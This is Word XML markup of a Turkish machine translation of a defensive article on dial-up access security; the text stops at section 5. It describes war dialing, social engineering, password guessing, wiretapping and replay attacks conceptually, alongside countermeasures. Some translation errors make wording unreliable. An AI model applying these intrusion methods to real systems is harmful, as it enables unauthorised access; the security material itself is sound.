        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DIAL-UP SECURITY CONTROLS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Alan Berman and Jeffrey L. Ott</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İçindekiler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>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oğrudan Arama ve Paket Anahtarlama İletimi,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>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Şifreler,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>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krobilgisayar Erişimi,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>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evirmeli </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Geri arama sistemleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>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Şifreleme İzinsiz Girişi İzleme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>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1.</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SORUNLAR ADRESLİ</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lgi sağlama ihtiyacı arttıkça, yetkisiz kullanıcıların çevrimiçi çevirmeli bilgisayar sistemlerine erişme kapasitesi artmıştır. Bu tehdit - ve böyle bir maruz kalmanın doğurduğu sonuçlar -, savunma bakanlığı bilgisayarlarına sızmadan büyük ağlara ya da paylaşılan bilgisayar tesislerine kadar yıkıcı sonuçlar doğurabilir. LAN tabanlı mikrobilgisayarlara duyulan güvenin artması, yalnızca yetkisiz kişilerin değiştirilmesine veya şirket kritik verilerinin silinmesine neden olma tehdidini arttırmaz, aynı zamanda ağ </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>kullanıcılarına virüs bulaştırması olasılığını da arttırır. Dial-in erişimi sağlamak, sadece genel kullanıcı için şebeke veya sistem erişimi ile sınırlı değildir. Sunucular, yönlendiriciler, anahtarlar ve diğer ağ altyapısı aygıtlarındaki bakım bağlantı noktalarına bağlı modemlerde gizlenen daha büyük bir pozlama vardır. Bağlı bir modemi olan herhangi bir bilgi işlem aygıtı, kesilecek bir aygıt arayan biri için potansiyel bir hedeftir. Bakım portlarıyla ilgili problemler şunlardır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>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Bu limanlara çok az dikkat edilir, çünkü satıcı dahil yalnızca bir veya iki kişi kullan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Cihazdaki düşük düzeyli idari makama anında erişim sağlarl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Genellikle, hiç değiştirilmeyen varsayılan kullanıcı kimlikleri ve şifreleriyle birlikte veril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Bir satıcı tarafından kullanılıyorsa, satıcıların tüm makinelerinde aynı kimliği ve şifreyi kullanma alışkanlığı vardır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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oğrudan ana sistemlere, sunuculara, anahtarlara, yönlendiricilere, PC'lere (hem iç hem de bilgisayar odasındaki), PBX'lere ve CBX'lere doğrudan bağlı modemleri arayın. Telekomünikasyon hizmetleri veren departmanı kontrol edin. Modemlere atanmış telefon numaralarının bir listesi olabilir. Ancak, buna güvenmeyin. En azından analog hatların bir listesini sunabilmeliler. Bunların çoğu faks makinesi olacak, ancak bazıları modem olacak. Son olarak, tüm modemlerin tanımlanmasını sağlamak için, borsadaki telefon numaralarına karşı bir savaşçı çalıştırın. Tehditler çok sayıda ve sonuçta mükemmel olsa da, çok az sayıda kuruluş bu sorunla mücadele etmek için eksiksiz güvenlik programlarına sahiptir. Bu makalede, çevirmeli hizmetlerin güvenliğini sağlamak için atılması gereken adımlar anlatılmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="348"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ARIZA ERİŞİM TÜRLERİ</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virmeli bağlantı özelliği standart bir telefon hattı kullanır. Modemi, veri iletmek ve almak için telefonu kullanmak için gereken arayüz cihazı, bir dijital akışı bir analog sinyale çevirir. Kullanıcının sitesindeki modem, bitlerle kodlanmış bilgisayar verilerini analog sinyale dönüştürür ve bu sinyali bir telefon hattı üzerinden bilgisayar sitesine gönderir. Bilgisayar alanındaki modem, analog sinyali tekrar ikili kodlu verilere çevirir. Bilgisayar sitesinden kullanıcı sitesine veri gönderme prosedürü tersine çevrilmiştir. Çevirmeli bağlantı özelliği, standart telefon şirketi doğrudan arama servisi veya paket anahtarlama şebekeleri aracılığıyla sağlanı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1 </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Direkt Arama</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oğrudan arama özelliği olan bir kullanıcı, kaynak cihazı ana bilgisayara bağlayan bir telefon numarasını çevirir. Bilgisayar sitesi, telefon hattını idare etmek için modemleri ve iletişim bağlantı noktalarını tutar. Standart çevirmeli hatlar, özellikle iletim yerel bir arama dışında bir şey içeriyorsa, pahalı olmayabilir. Örneğin, New York’taki bir aracı kurum veya banka hizmetine erişmesi gereken Kaliforniya’daki bir müşteri, günlük veya haftalık erişim ve iki yönlü iletim için yasak olan standart bir telefon şirketi çevirme hattı üzerinden iş yapmanın maliyetini bulu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lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.1.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Paket Anahtarlama</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ket anahtarlama ağları, uzun mesafeli çevirmeli bağlantı servisinin yasaklayıcı telefon maliyetlerine bir çözüm sunar. Örneğin, Kaliforniya kullanıcısı doğrudan çevirmeli ağ sistemine yalnızca aynı tip telefon ve modemi kurmaya ihtiyaç duyar. Kullanıcı, New York alan koduyla bir numara çevirmek yerine, alandaki anahtarlama düğümü ile bağlantı kuran yerel bir telefon numarasını çevirir.</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ahili olarak, paket anahtarlama veri iletimi, doğrudan çevirmeli mesaj iletilmesinden farklı şekilde ele alınır. Doğrudan bir bağlantı oluşturmak ve ana bilgisayara ve bilgisayardan veri akışlarını göndermek ve almak yerine, paket anahtarlama ağları bir düğümde birkaç ileti alır. Mesajlar daha sonra veri paketlerine ayrılır. Her paketin bir boyut sınırlaması vardır ve bu boyutu geçen iletiler birkaç pakete bölünmüştür. Paketler atanan hedefe ulaşılana kadar düğümden ağdaki düğüme geçirilir. Mesajın hedefini belirtmek için kullanıcı atanmış bir kimlik kodu ve bir şifre girer. Girilen kodlar yetkilendirme ile ilişkilendirilir ve adreslenen bilgisayar sitesini belirtir. Kullanıcının amaçları doğrultusunda, ana bilgisayara bağlanma, bir çevirmeli bağlantı hattının kullanılmış olması ile aynıdır, ancak aramanın maliyeti büyük ölçüde azalır.</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Hem çevirmeli ağ servisi hem de paket anahtarlama ağlarında, ana bilgisayar bilgisayarda depolanan verilere erişimi korumaktan sorumludur. Paket anahtarlama ağları bir düğüme bağlanmak için bir kullanıcı kimliği ve bir parola gerektirdiğinden, ek bir güvenlik önlemi sağladıkları görülüyor; ancak, bu her zaman böyle değildir ve bu, paket anahtarlama ağ satıcısına güvenlik sorumluluğunu iptal etmek için bir neden olmamalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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r süredir, belirli satıcının paket anahtarlama ağ tesislerinin kullanıcıları, kullanıcı kimliğini ve şifre kontrolünü atlamanın mümkün olduğunu biliyorlar. Çok az deney yapıldığında, Amerika Birleşik Devletleri ve Kanada'daki çeşitli çevirmeli bilgisayar sitelerine herkesin erişebileceği keşfedildi, çünkü bu bilgisayar sitesi iletişim portlarının alan kodları ilgili telefon şebekesi alan kodlarının üç hanesiyle ön yüze yerleştirilir. . Bilgisayar adresinin geri kalanı üç sayısal karakter ve bir alfanümerik karakterden oluşur. Bu nedenle, alan kodunu içeren 10 basamaklı bir çevirmeli numara belirlemek yerine, bir hacker basit bir şekilde doğru sayısal kod sırası tanımlayıcıyı belirlemelidir. Alfabetik karakter araması, sayısal kümedeki ilk adresin doğru kodu girilene kadar A harfini, ikinci B'yi vb. Kullandığını varsayarak basitleştirilir veya elimine edilir. Bir bilgisayar sitesine erişmek yalnızca yerel bir düğüm numarası gerektirir ve bu numaralar genellikle paket anahtarlama ağ sitelerinde yayınlanır. Yerel düğüm numarasının kullanılması, yetkisiz kullanıcılar için çevirmeli erişim hattı maliyetlerini de önemli ölçüde azaltır. Paket anahtarlama ağ satıcıları bu soruna farklı derecelerde başarı ile yanıt verdiler, ancak bu ağlar kullanıldığında özel bir önlem alınmalıdı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2 </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RİSKLERİN AZALTMASI</w:t>
      </w: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t xml:space="preserve">Bilgisayar korsanlarının bilgisayar sistemlerine erişebilmelerini sağlayacak telefon numaralarını edinmenin çeşitli yolları vardır. Belirli bir alan kodundaki telefon numaralarını rasgele çevirmek veya iblis çeviricileri veya savaş çeviricileri kullanarak telefonla değiş tokuş yapmak için girişimler yapılabilir. Bunlar 1980 filmi Savaş Oyunları'nda popülerdi. Bu bilgisayar korsanlığı programları, tesiste bulunan tüm yetkili ve yetkisiz modemleri bulmakta çok faydalı olabilir. Savaş çeviricileri, Procomm Plus iletişim yazılımı paketi tarafından </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sağlananlar gibi bir komut dosyası dili kullanılarak yazılabilir veya İnternet'teki çeşitli sitelerde birkaç kişi bulunabilir. Bu çeviricileri anlamak, çevirmeli bağlantıların güvenliğini sağlamak için gereken gereksinimleri anlamada çok yararlıd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rayan kişinin inanılır ve kalıcı olması durumunda, bir şirketi aramak ve çevirmeli numarayı istemek gibi daha basit yöntemler başarılı olabilir. Operasyonel personeli günün en yoğun saatinde (örneğin, borsa veya banka kapanmadan önce, günün sonunda) aramak, acilen bilgisayar operatöründen veya katipten yanıt alması daha muhtemel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iğer yöntemler, çevirmeli bilgisayarın sayısını açığa çıkarabilecek atılan telefon kayıtlarını bulmak için çöp kutusundan rumma işleminden oluşur. Bir hacker, doğru çizgiyi bulmayı umarak bu numaraları manuel olarak deneyecektir. Bu, muhtemelen en uzun süreli telefon görüşmesine sahip olan olacakt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elefon numaralarının alınabileceği daha az ezoterik araçlar da vardır. E-posta, ürün siparişi, banka erişimi, hisse senedi alım satım ve ilan tahtaları gibi uygulamalar için çevrimiçi hizmetler genellikle numaralarını postaladıkları örnek materyalde yayınlamaktadır. Aslında, servisi gösteren birinin omzuna bakmak ve onu numarayı izlemek genellikle mümkündür. Gösteri otomatikleştirilmişse, numara ekranda görüne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Numarayı telefon rehberinde listeleme ya da telefon şirketi bilgi operatörlerinin kullanımına izin verme uygulaması kısıtlanmış olsa da, bu potansiyel olarak etkili bir yöntem olmaya devam etmekte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Nasıl elde edilirse edilsin, telefon numarası hacker topluluğu boyunca yeraltı bülten panoları aracılığıyla hızlı bir şekilde yayılabilir. Numara dağıtıldıktan sonra, oyuncunun oyunu başlar. Artık kullanıcıların oturum açmasına izin veren güvenliği bozma meselesi.</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Uzak bilgisayar sistemlerinin kullanıcılarını tanımlamak için kullanılabilecek fiziksel cihazlar (örneğin, kartlar, kartlar, PROMS) olmasına rağmen, bu sistemlerin hemen hepsi erişim kontrolü için geleneksel kullanıcı tanımlama ve şifre koruma mekanizmalarına dayanmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pP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3 </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kimlik</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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Çevirmeli kullanıcıları tanımlamanın birincil yolu, kullanıcı kimlikleri atama uygulamasıdır. Geleneksel olarak, kullanıcı kimliği 6 veya 7 alfa sayısal karakterdir. Ne yazık ki, kullanıcı kimlikleri, bilgisayar korsanlarına bir avantaj sağlayan sıralı olma eğilimindedir (örneğin, USER001, USER002). Örneğin, hacker bülten panoları, XYZ’nin şirket kimliğinin XYZ001’de başladığını ve art arda çalıştığını bildiriyor. Notu yazan hacker, kimliği XYZ001'e saldırdığını açıklayacaktır. Bildirimi okuyan ilk bilgisayar korsanı, XYZ002 kullanıcısı olarak giriş yapmaya çalışacağını ve bir sonraki bilgisayar korsanının XYZ003'ü alacağını söyleyen bir not bırakacaktır. Net sonuç, her biri farklı bir kullanıcı kimliğini hedef alan birden çok bilgisayar korsanının aynı anda saldırı yapmasıdır. Bu, sisteme girme şanslarını önemli ölçüde artırıyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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Bilinmeyen bir şekilde, bazı güvenlik yazılımları aslında geçerli kullanıcı kimliklerini belirlemeye yardımcı olabilir. Bir bilgisayar korsanı kullanıcı kimliğini ve şifreyi girmeye çalıştığında, sistem "Geçersiz Kimlik, Lütfen Yeniden Girin" mesajı ile geçersiz bir kullanıcı kimliğinin girilmesine yanıt verebilir. Bu, korsanın çabalarını geçerli bir kimliği girmeye odaklamasına izin verir Geçerli bir kimlik ve parola alma konusunda çok daha karmaşık bir çaba ile uğraşmak zorunda kalmak.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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 xml:space="preserve">Aynı tip güvenlik sistemi, davetsiz misafirlere “Geçersiz Şifre, Lütfen Tekrar Girin” hata mesajını vererek geçerli bir kullanıcı kimliği bulduğunu her zaman söyleyecektir. Daha </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sonra kullanıcı kimliği dizisi desenini bulmaya (bülten panosuna yazı göndermeye) veya parola korumasını kırmaya çalışmasına odaklanmaya devam edebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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Parola istemeden önce geçerli bir kullanıcı kimliği isteyen girişler, sistem saldırganlarına da büyük bir avantaj sağlayabilir. En iyi güvenlik sistemi aynı anda hem kullanıcı kimliği hem de parola girilmesini gerektirir. Sistem kombinasyonu doğrulamaya çalışır; geçersiz bulunursa, “Kullanıcı Kimliği / Şifre Geçersiz, Lütfen Tekrar Girin” mesajı ile yanıt verir. Bu, hangi öğenin geçerli olmadığına bakılmaksızın gönderilen tek hata mesajıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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4 </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Şifreler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kullanımı, bir bilgisayar sistemi kullanıcısının kimliğini doğrulamak için en yaygın kullanılan yöntemdir. Parolaların tasarımı kolaydır ve ek donanım gerektirmeden hızlı bir şekilde uygulanabilir. Uygun metodoloji kullanıldığında, şifre güvenliği, büyük bir harcama yapmadan yetkisiz sistem erişimine önemli bir engel teşkil ede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tanımlama ve kimlik doğrulamayı etkin bir güvenlik aracı yapmak için belirli kurallara uyulmalıdı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Parolaların manuel veya otomatik sistem saldırısı veya saf tahminde bulunmalarını engellemek için yeterli uzunlukta olması gerek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o kadar uzun olmamalı, hatırlaması zor ve bu nedenle yazılmaları zor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Şifreler algoritma tarafından türetilmeli veya tek yönlü şifreli bir dosyada saklan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keyfi olarak atandığında en etkili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sıkı kontroller altında, tercihen çevrimiçi olarak dağıtı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Önceden verilen şifrelerin denetim izi oluşturulmalıdır. • Bireysel şifreler özel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aşınabilir belirteçle oluşturulan rastgele şifrelerin kullanımı teşvik edilmelidir. Jetonlar nispeten ucuz ve oldukça güvenilirdi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tanımlama metodolojisinin derinlemesine çalışılması için yeterli bir zaman mevcut değilse, rastgele seçilen ve şifrelenmiş bir dosyada depolanan altı karakterlik bir parola kullanılarak temel olarak sağlam bir parola yapısı yaratılabilir. Böyle bir prosedür bazı güvenlik önlemleri sağlar, ancak daha önemli bir metodoloji tasarlamak ve uygulamak için alınmalıd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şitli güvenli verilere erişmek için birden fazla şifre kullanılabilir. Bu sistem, her giderek daha hassas veri seviyesi için kullanıcının farklı bir parolaya sahip olmasını gerektirir. Güncelleme ve sorgulama aktiviteleri için farklı şifreler kullanmak bile, tüm fonksiyonlar için tek bir şifreden çok daha fazla güvenlik sağ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lgisayar ve ağ güvenliği sistemleri son on yılda bazı kazanımlar elde etti. Bırakılan bir hatta erişmenin ve oturum açma güvenliğini atlarken yeniden bağlanmanın yol açtığı eski sorunlar giderildi. Doğrudan bağlantı bile (yani düğüme hitap etmek ve kullanıcı kimliğini ve parola doğrulamasını atlamak) bile düzeltildi.</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elefon numaralarını, kullanıcı kimliklerini ve diğer bilgisayar korsanlarının bülten panoları veya diğer yollarla şifre bilgilerini almasının yanı sıra, bilgisayar korsanlarının çevirmeli sisteme erişmek için gerekli bilgileri edinmenin üç temel yolu vardı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Manuel ve bilgisayar tarafından oluşturulan kullanıcı kimliği ve şifre tahmin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Kişisel iletişim</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el Çekicile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ir kullanıcı kimliği verildiğinde, bilgisayar korsanı şifreyi iki yoldan biriyle tahmin etmeye çalışabilir: sık kullanılan şifreleri deneyerek veya bilgisayarı, sözlükteki kelimeleri kullanarak veya rastgele oluşturulmuş karakter kümelerini kullanarak şifre düzenine saldırmak için programlayarak. Bilgisayar korsanı, bilgisayara girmek istediği şirket sistemini otomatik olarak arayabilir ve geçerli bir kullanıcı kimliği ve şifre kombinasyonu bulmaya çalışabilir. Eğer ana bilgisayar sistemi bağlantısı kesilirse, bilgisayar tekrar arar ve doğru kombinasyon bulunup erişim sağlanıncaya kadar denemeye devam eder. Bu saldırı, bilgisayar sistemi müsait olduğu sürece kesintisiz olarak devam edebilir. Bu yaklaşımın sakıncası, denemeler keşfedilirse çağrının izlenebilmesi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aha basit bir yaklaşım, hacker'ın saldırıya uğrayan bilgisayarın sitesini kişisel olarak ziyaret etmesidir. Bir çalışanla arkadaş olarak, sisteme erişmek için gereken tüm bilgileri elde edebilir. Bilgisayar korsanına yalnızca tesislerde izin verilse bile, terminalin yan tarafına yapıştırılmış, kullanıcının bülten panosunda taranan veya dikkat çekici bir şekilde görüntülenen bir kullanıcı kimliği ve şifresi bulacaktır. Kullanıcı kimliklerini ve şifrelerini korumak için temel özen gösterilmelidir. Örneğin, asla kimseyle paylaşılmamalı veya tartışılmamalıd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otansiyel olarak geçerli kullanıcı kimliklerini ve şifrelerini belirlemenin en zarar verici yolu, telefon kayıtlarında telefon kayıtlarında tel çekme cihazlarının kullanımıdır. Düz metin bilgisi daha sonra kullanmak üzere kaydedilebilir. Telefon dinleme, bilgisayar korsanının ciddi bir işlem yapma niyetini gösterir. Bilgisayar korsanını, hırsızlık, zimmete alma veya casusluk ile ilişkilendirilme riskine maruz bırak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Şifreleme bile telefon dinleme hacker'ını engellemeyebilir. Bilgisayar korsanı, şifreli verileri tekrarlama adı verilen bir teknik kullanarak yorumlamanın yetersizliğini giderebilir. Bu taktik, şifre metnini yakalamayı ve daha sonra yeniden iletmeyi içerir. Sonunda, hacker oturum açma dizisi şifresini yakalar ve tekrar eder. Veri akışı geçerli olarak kabul edilir ve bu nedenle bilgisayar korsanına sisteme erişim izni verilir. Bir tekrarlama saldırısıyla mücadele etmenin tek yolu, şifrelenmiş verinin zamanlanması veya dizinin damgalanmasıdır. Bu, oturum açmanın yalnızca bir kez kullanılabildiğinden ve tekrar oynatılmayacağından emin olmanızı sağ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elefon dinlemeye karşı en iyi savunma, fiziksel güvenliktir. Telefon dolapları ve odalar, kartlı anahtar erişimi ile korunmalıdır. Kapalı devre kameralar erişimi izlemeli ve kaydetmelidir. Eğer bilgisayar korsanı iletişim hatlarına erişemezse, telefonla konuşamaz ve bilgi kaydedemez.</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5 </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
